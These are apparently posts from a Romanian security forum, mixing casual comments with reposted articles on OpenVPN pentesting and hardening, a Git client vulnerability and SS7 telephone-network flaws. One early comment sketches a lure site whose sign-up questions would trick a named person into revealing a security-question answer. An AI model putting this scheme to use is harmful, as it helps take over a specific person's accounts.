Cum s-a discutat si https://rstforums.com/forum/94054-legea-securit-ii-cibernetice-votat-de-ale-i-sri-acces-la-calculatoarele-perso.rst <- nu e nimic nou si nu s-a schimbat nimic si nu o sa se schimbe nimic, asta e doar o formalitate... e doar ceva "official" chestia asta se intampla de mult timp.

Ba da voi nu observati ca e doar un bot de spam?

Cum a spus si @iam60 si daca are un hamster, un iepure, un caine si o pisica de unde stii ca e numele hamsterulului? o varianta ar fi sa pui 3 intrebari. -Numele mamei -Care e animalul tau preferat ( dintre animalele pe care le ai) -Numele animalului tau (aici e tot la noroc... ) o varianta ar fi sa fie ceva targetat pe hamsterul lui Viorel si site-ul sa se bazeze pe hamsteri... cum am prezentat eu mai sus. si la inregistrare pui: - Care este nimele hamsterului tau : - De cat timp il ai? - Ce ii place sa manance (nu poti pune doar o intrebare fiindca ar da de banuit)

http://www.000webhost.com/ http://www.freewebhostingarea.com/ http://www.weebly.com/features/#!/free-web-hosting https://byethost.com/free-web-hosting http://5gbfree.com/ http://www.freehostia.com/index2.html http://haphost.com/ https://www.x-o.ro/ https://www.freehosting.com/ faza e ca tu vrei si free si bun daca nu vreti sa da-ti bani incetati cu mofturile...

Frate de 25 de ani ( de la revolutie ) nu s-a schimbat nimic in Romania si nu se va schimba, smecheriile se fac deja pe la spatele "fraierilor" stai tu linistit ca nu o sa iti ceara nimeni parerea sau sa te intrebe daca "ti se pare corect" Intelege ca peste tot e la fel ( adica comunism ). E ca si cum ai lua o sticla de cola si i-ai pune eticheta "Pepsi" acelasi lucru a fost si cu revolutia, totusi sa nu o dam in astfel de discutii dintr-o stire de genu...

Introduction A VPN (Virtual Private Network) enables connections between clients and servers from multiple different internal networks across a public network (like the Internet) as if the nodes were located in the same private network. Since the communication is transferred across the public network, it must be properly encrypted to prevent eavesdropping. When a user is connected to the VPN connection, he/she can access the extended network services the same way as if they were located with its private network. There are two types of VPNs: the remote-access VPN used to connect a device to a network and site-to-site VPN used when connecting two networks together. A VPN can be used for multiple different scenarios, like allowing employees to securely access the company’s internal network even when outside the office (remote-access VPN), connecting two remote offices together into one internal private network (site-to-site VPN), etc. There are different implementations of the VPN protocols, including the ones listed below (summarized after [1]): Internet Protocol Security (IPsec): a widely used VPN implementation that uses IPv4 and operates on layer 2, where the packet is encapsulated into an IPsec header and sent to its endpoint. Transport Layer Security (SSL/TLS): another widely used VPN implementation that’s most often incorporated with OpenVPN, which we’ll take a look in this article. OpenVPN is an SSL-based VPN that uses SSL certificates to encrypt the data in transit. Datagram Transport Layer Security (DTLS) Microsoft Point-to-Point Encryption (MPPE) Microsoft Secure Socket Tunneling Protocol (SSTP) Secure Shell (SSH) VPN Pentesting OpenVPN Depending on the type of VPN we’re checking during our penetration test, there are different procedures that will drive our testing. Despite the type of VPN being used, the basic steps to pentest the VPN are the following: Reconnaissance: the first step is determining which type of VPN we’re dealing with in order to plan how to proceed with the attack. We can do that with a simple port scan by using an open-source tool like Nmap or any other tool with port scanning capabilities. The purpose is determining the type of VPN implementation we’re dealing with, which is often bound to a default port. Usually the following ports are involved with VPN services: UDP 500 (IPSec), TCP 1723, TCP 443 (SSL VPN) and UDP 1194 (OpenVPN). Exploitation: the phase is under direct influence of the type of the VPN we’re dealing with. When testing network-based IPSec VPN, we can rely on the Ike-scan program to perform the testing. First, we can identify the VPN product and its version and search for related vulnerabilities online; there are vulnerabilities for different vendors like Cisco or CheckPoint regarding the VPN services that we can use to our advantage. When dealing with SSL VPN, we could theoretically use the tools used for SSL pentesting, and in some cases we can do that, but most tools out there support TCP protocol only, where UDP isn’t supported. One of the most critical vulnerabilities this year has been the HeartBleed vulnerability, which affects the OpenSSL library that OpenVPN is also using. Therefore, if OpenVPN is using a vulnerable version of the OpenSSL library, the service can be exploited by malicious attackers and the whole server can be compromised. This is why we have to take every security precaution in order to protect our network. Credentials: when the connection with a VPN server is initiated, a client must present a valid passphrase or a certificate to prove that it’s authorized to use the server. If the VPN server is only using passphrases, we should instead configure to use certificates with each of the passphrases to improve security. I’ve often seen a VPN server using only user credentials to authenticate to the VPN server; not to mention some of the user passwords were quite simple and easy to guess within a few bruteforcing attempts. That is certainly something we have to keep in mind when conducting a penetration test of the VPN server or when setting up such a server for our own network. Recommendations for Hardening OpenVPN To harden the OpenVPN security, we have to edit its configuration file, usually passed to the OpenVPN daemon by the –config command-line option. If we use the “ps -ef” command and grep the OpenVPN processes, we can see where the configuration file is located and view it accordingly. Table 1: Security configuration options in openvpn.conf Conclusion It goes without saying that when a hacker stumbles upon an open VPN port, he will most likely check it for different security holes. Therefore, we have to properly protect our VPN server in order to secure our users and our whole internal network. If an attacker is able to compromise the VPN service, he can get access to our whole network. Some of the administrators might argue that the VPN service is very secure by itself and needs no additional protection, but such predictions have been proved incorrect in the past. One such vulnerability was found in April 2014, named the HeartBleed vulnerability, which can be used to dump memory from the OpenVPN daemon process. Therefore, if an attacker is able to determine that VPN service is running on some port, he might be able to dump arbitrary memory from the server or possibly even take control of the server. Once such a vulnerability is discovered, we must patch it as soon as possible, but properly a hardened service should give an attacker as little access to the server as possible. Imagine a new devastating vulnerability being found in OpenVPN/OpenSSL in the future; a secure service running under an unprivileged account might be just what you need to protect yourself from being a victim of cyber attack. References [1] Virtual private network, https://en.wikipedia.org/wiki/Virtual_private_network. [2] Hardening OpenVPN Security, https://openvpn.net/index.php/open-source/documentation/howto.html#security. Source

Developers running the open source Git code-repository software and tools, like GitHub, on Mac OS X and Windows computers are highly being recommended to install a security update that patches a major security vulnerability in Git clients that leverages an attacker to hijack end-user computers. The critical Git vulnerability affects all versions of the official Git client and all the related software that interacts with Git repositories, including GitHub for Windows and Mac OS X, according to a GitHub advisory published Thursday. HOW GIT BUG WORKS The vulnerability allows an attacker to execute remote code on a client’s computer when the client software accesses Git repositories. The GitHub engineering team gave a detailed explanation on how attackers might exploit the vulnerability: PATCH RELEASED However, the advisory didn’t state if the vulnerability is being or has been exploited in wild by the hackers, but it confirmed that GitHub for Windows and GitHub for Mac are both affected and should be updated as immediately as possible. GITHUB REPOSITORIES ARE SAFE Developers using GitHub’s client for Windows or Mac can download Git version 2.2.1, a maintenance release that includes a security fix for a critical vulnerability, and it requires a client update to be fully addressed. The security update also includes new releases with the same security fix for older versions of the Git command-line client. Since, repositories on Github verifies and blocks malicious contents during its verification process, therefore repositories on github.com are protected. But, it is not necessary that other sites hosting repositories provide the same security measures, so all Git users are recommended to upgrade immediately. DOWNLOAD NOW Check out the Git version 2.2.1 release for further information on the security fixes. Updated version of GitHub for Windows are available here and GitHub for Mac are available here for immediate download. Git is a revision control system, and GitHub is a hosting service for Git repositories, both are widely used to collaborate on open-source projects and for proprietary software that different companies build and maintain. Source

Security researchers have discovered a massive security flaw that could let hackers and cybercriminals listen to private phone calls and read text messages on a potentially vast scale – no matter if the cellular networks use the latest and most advanced encryption available. The critical flaw lies in the global telecom network known as Signal System 7 that powers multiple phone carriers across the world, including AT&T and Verizon, to route calls, texts and other services to each other. The vulnerability has been discovered by the German researchers who will present their findings at a hacker conference in Hamburg later this month. NUMBER OF SECURITY FLAWS IN SS7 SS7 or Signaling System Number 7 is a protocol suite used by most telecommunications operators throughout the world to communicate with one another when directing calls, texts and Internet data. It allows cell phone carriers to collect location information from cell phone towers and share it with each other. A United States carrier will find its customer, no matter if he or she travels to any other country. According to the security researchers, the outdated infrastructure of the SS7 makes it very easy for hackers to hack, as it is loaded with some serious security vulnerabilities which can lead to huge invasions of privacy of the billions of cellular customers worldwide. BACKDOOR OPEN FOR HACKERS So far, the extent of flaws exploited by hackers have not been revealed, but it is believed that using the flaws hackers can locate or redirect users' calls to themselves or anywhere in the world before forwarding to the intended recipient, listen to calls as they happen, and record hundreds of encrypted calls and texts at a time for later decryption. No matter how much strong or advanced encryption the carriers are using, for example AT&T and Verizon use 3G and 4G networks for calls, messages, and texts sent from people within the same network, but the use of that old and insecure SS7 for sending data across networks the backdoor open for hackers. Not just this, use of SS7 protocol also makes the potential to defraud users and cellular carriers, according to the researchers. ACLU – STOP USING TELEPHONE SERVICE, BUT WAIT!! IS THAT POSSIBLE? The American Civil Liberties Union (ACLU) has also warned people against using their handset in light of the breaches. Soghoian also believes that security agencies – like the United states' NSA and British security agency GCHQ – could be using these flaws. "Many of the big intelligence agencies probably have teams that do nothing but SS7 research and exploitation. They've likely sat on these things and quietly exploited them," he said. However, the poor security capabilities of SS7 protocol is not hidden from the people and its not at all a new, just three months ago we reported How a Cell Phone User Can be Secretly Tracked Across the Globe. But the era where each and every person care about privacy and security of their data, things like this really publicize exactly how big this threat really is and make many worried of its consequences. Source